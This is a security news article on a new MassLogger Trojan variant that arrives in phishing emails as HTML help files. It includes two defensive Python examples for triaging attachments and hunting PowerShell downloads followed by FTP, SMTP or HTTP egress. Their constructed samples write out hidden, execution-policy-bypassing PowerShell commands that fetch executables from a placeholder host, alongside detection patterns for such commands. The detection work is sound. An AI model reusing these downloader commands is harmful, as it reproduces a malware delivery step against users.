New version of MassLogger Trojan detected in phishing campaign

Cybersecurity experts reported the detection of a new version of MassLogger, a Trojan distributed through phishing campaigns and used to steal credentials from Chrome, Outlook, messaging apps and other platforms.

Researchers report that this new iteration reaches Windows users as an HTML-based file format that, under normal conditions, is used for system help files. Files in this format may also contain fragments of JavaScript, which the attackers take advantage of to deploy the attack. The campaign was reported by Cisco Talos specialists in mid-January 2021.

Most of the activity has been detected in European countries, including Spain, Italy, Russia and Turkey. In the observed attacks, MassLogger conceals its malicious RAR files when initiating the infection, which helps the attackers evade security mechanisms on the target system; this is a feature recently added to the Trojan.

MassLogger operators employ a multi-stage, modular approach that begins with the phishing campaign and ends with the delivery of the final payload. Although these techniques are complex, the length of the chain can also work in researchers' favour: interrupting any one stage disrupts the whole attack.

The phishing emails carry legitimate-looking subject lines to trick users. The messages embed JavaScript code that creates an HTML page containing a PowerShell downloader; the downloader connects to a legitimate server and retrieves the loader, which in turn launches the MassLogger payload.
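The HTML-plus-JavaScript stage described above is the point at which a mail gateway or sandbox can triage the attachment statically, before any PowerShell runs. The script below is an added example written for this article; it is not code from the article or from Cisco Talos. It inspects only the `<script>` blocks of an HTML document and scores them on three assumed signature lists (a PowerShell launcher, download verbs, and window-hiding or policy-bypass flags); both sample documents are constructed, and the `launch()` helper in the suspicious one is deliberately undefined so the sample is inert.

```python
"""Static triage of an HTML help-style attachment for an embedded PowerShell
download stage. Added example, not code from the article or Cisco Talos;
signature lists are assumptions and both sample documents are constructed."""
import re
from dataclasses import dataclass, field

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# Process that gets launched, common download verbs, and flags that hide the
# window or bypass execution policy. Matching happens only inside <script>.
LAUNCHER_RE = re.compile(r"\b(?:powershell(?:\.exe)?|pwsh)\b", re.IGNORECASE)
CRADLE_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient"
    r"|Start-BitsTransfer|Invoke-Expression|\biex\b",
    re.IGNORECASE,
)
EVASION_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass"
    r"|-enc(?:odedcommand)?\b|-nop\b|-noni\b",
    re.IGNORECASE,
)

# Constructed sample: a page whose script assembles a PowerShell download
# command. launch() is intentionally undefined, so the sample cannot run.
SUSPICIOUS_HTML = """<html><head><title>Invoice</title></head><body>
<p>Loading document, please wait...</p>
<script>
var cmd = 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass '
        + '-Command "Invoke-WebRequest https://example.invalid/stage2 -OutFile stage2.exe"';
launch(cmd);
</script></body></html>"""

# Constructed benign help page: its script only reveals a hidden section.
BENIGN_HTML = """<html><body><h1>Printing help</h1>
<a href="#" onclick="toggle()">Show details</a>
<div id="details" style="display:none">Select File, then Print.</div>
<script>
function toggle() { document.getElementById('details').style.display = 'block'; }
</script></body></html>"""


@dataclass
class Finding:
    verdict: str                                   # "high", "medium" or "none"
    indicators: list = field(default_factory=list)  # lower-cased matched strings
    urls: list = field(default_factory=list)        # URLs seen inside scripts


def triage_html(html: str) -> Finding:
    """Score one HTML document; only the contents of <script> blocks are used."""
    scripts = SCRIPT_RE.findall(html)
    if not scripts:
        return Finding("none")
    body = "\n".join(scripts)
    launcher = {m.group(0).lower() for m in LAUNCHER_RE.finditer(body)}
    cradle = {m.group(0).lower() for m in CRADLE_RE.finditer(body)}
    evasion = {m.group(0).lower() for m in EVASION_RE.finditer(body)}
    urls = URL_RE.findall(body)
    if launcher and (cradle or urls):
        verdict = "high"      # PowerShell plus something to fetch: the described stage
    elif launcher or cradle:
        verdict = "medium"    # one half of the pattern; worth a human look
    else:
        verdict = "none"
    return Finding(verdict, sorted(launcher | cradle | evasion), urls)


if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_HTML), ("benign", BENIGN_HTML)):
        print(name, triage_html(doc))
```

The verdict deliberately requires both a launcher and either a download verb or a URL before reporting "high", so a help page that merely mentions PowerShell in its text is not flagged; because only `<script>` contents are scored, ordinary HTML help content never contributes to the score.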

As for the malware itself, experts describe MassLogger as spyware that extracts user credentials from multiple platforms, including Chrome and Outlook. The new variant is written in .NET, which can complicate static analysis. Although MassLogger was first detected almost a year ago, the new variant is considerably more capable, as its authors have redesigned it to evade detection.

In this campaign, MassLogger v3.0.7563.31381 exfiltrates data via FTP, SMTP or HTTP and adds functionality for stealing credentials from platforms such as Discord, Firefox, Chrome, Edge and Brave, among other services. The malware can also be configured as a keylogger, but that functionality has not been observed in this campaign.
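The three exfiltration channels named above (FTP, SMTP, HTTP) give endpoint telemetry a second chance to catch the infection after the PowerShell download stage. The hunt below is an added example written for this article, not code from the article or from Cisco Talos: it looks for PowerShell with a download verb spawned by a help-file viewer, mail client or browser, then for outbound connections on the FTP, SMTP or HTTP ports from the same host within a ten-minute window, made by a process that is not expected to speak that protocol. The Sysmon-style event format, the process names (including `hh.exe` as the Windows HTML Help viewer), the port-to-protocol table and the window are assumptions; all events are constructed.

```python
"""Hunt for the chain the article describes: PowerShell download launched from a
help-file viewer or mail client, followed by outbound FTP, SMTP or HTTP from a
process that normally has no business using that channel. Added example, not
code from the article or Cisco Talos; event format, process names and window
are assumptions, and every event below is constructed."""
import json
import re
from datetime import datetime, timedelta

CRADLE_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumption: parents that should not be spawning PowerShell on a workstation.
# hh.exe is the Windows HTML Help viewer; the rest are the mail client and browsers.
PHISHING_PARENTS = {"hh.exe", "outlook.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# The three exfiltration channels the article names, keyed by destination port,
# and the processes expected to use each one on this (assumed) workstation image.
PORT_PROTO = {21: "ftp", 25: "smtp", 587: "smtp", 80: "http", 443: "http"}
EXPECTED_TALKERS = {
    "ftp": set(),
    "smtp": {"outlook.exe"},
    "http": {"outlook.exe", "chrome.exe", "msedge.exe", "firefox.exe"},
}
WINDOW = timedelta(minutes=10)

# Constructed Sysmon-style events (id 1 = process create, id 3 = network connect),
# reduced to image basenames and the fields used below. WS01 is the infected
# host; WS02 carries an admin script and a mail client that must not fire.
SAMPLE_EVENTS = r"""
{"ts":"2021-01-15T09:00:01","host":"WS01","id":1,"image":"hh.exe","parent":"outlook.exe","cmdline":"hh.exe document.htm"}
{"ts":"2021-01-15T09:00:04","host":"WS01","id":1,"image":"powershell.exe","parent":"hh.exe","cmdline":"powershell.exe -WindowStyle Hidden -Command Invoke-WebRequest https://example.invalid/ldr -OutFile ldr.exe"}
{"ts":"2021-01-15T09:00:06","host":"WS01","id":3,"image":"powershell.exe","dst":"203.0.113.10","dport":443}
{"ts":"2021-01-15T09:01:30","host":"WS01","id":1,"image":"ldr.exe","parent":"powershell.exe","cmdline":"ldr.exe"}
{"ts":"2021-01-15T09:02:10","host":"WS01","id":3,"image":"ldr.exe","dst":"203.0.113.20","dport":21}
{"ts":"2021-01-15T09:02:12","host":"WS01","id":3,"image":"ldr.exe","dst":"203.0.113.21","dport":587}
{"ts":"2021-01-15T09:05:00","host":"WS02","id":1,"image":"powershell.exe","parent":"explorer.exe","cmdline":"powershell.exe -File backup.ps1"}
{"ts":"2021-01-15T09:05:03","host":"WS02","id":3,"image":"outlook.exe","dst":"198.51.100.5","dport":587}
{"ts":"2021-01-15T09:05:09","host":"WS02","id":3,"image":"chrome.exe","dst":"198.51.100.9","dport":443}
"""


def parse_events(text):
    """One JSON object per line; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def hunt(events):
    """Return one alert per triggering PowerShell launch that is followed, on the
    same host and within WINDOW, by egress on an exfiltration port from an
    unexpected process."""
    events = sorted(events, key=lambda e: e["ts"])
    alerts = []
    for e in events:
        if e["id"] != 1 or e["image"].lower() not in POWERSHELL:
            continue
        if e["parent"].lower() not in PHISHING_PARENTS or not CRADLE_RE.search(e["cmdline"]):
            continue
        t0 = datetime.fromisoformat(e["ts"])
        egress = []
        for n in events:
            if n["id"] != 3 or n["host"] != e["host"]:
                continue
            tn = datetime.fromisoformat(n["ts"])
            proto = PORT_PROTO.get(n["dport"])
            if t0 <= tn <= t0 + WINDOW and proto and n["image"].lower() not in EXPECTED_TALKERS[proto]:
                egress.append({"ts": n["ts"], "image": n["image"], "port": n["dport"], "proto": proto})
        if egress:
            alerts.append({"host": e["host"], "trigger": e["cmdline"], "egress": egress})
    return alerts


if __name__ == "__main__":
    print(json.dumps(hunt(parse_events(SAMPLE_EVENTS)), indent=2))
```

On the constructed data the hunt raises a single alert for WS01: the HTTPS fetch by PowerShell itself (the download stage), then FTP and SMTP connections from the dropped loader (the exfiltration stage). WS02 stays quiet because its PowerShell was started by Explorer without a download verb and its SMTP and HTTPS traffic comes from the mail client and browser, which the expected-talker table allows.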

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) website.